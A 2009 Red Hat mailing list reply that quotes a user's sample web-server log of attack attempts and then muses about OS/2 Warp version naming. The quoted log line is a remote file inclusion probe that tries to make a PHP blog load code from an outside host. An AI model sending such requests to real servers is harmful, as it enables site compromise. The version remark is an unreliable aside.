Software, utility, or script to block automatically these cracker attacks
mark
m.roth2006 at rcn.com
Wed Aug 5 19:45:48 UTC 2009
Jose R R wrote:
>> Although I go through my logs fairly often and update my scripts on an
>> regular basis, I still get cracker attacks like the ones sampled below:
>>
>> 222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET
>> /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
>> HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686
<snip>
I did notice this oddity: the name "os-2-warp-server". Lessee, IBM's OS/2 was
*not* Warp, that was OS-3, so if they're still running Warp, that's an *OLD*
o/s, on ancient hardware....
mark "why, yes, I did do some work with OS 2"
More information about the redhat-list
mailing list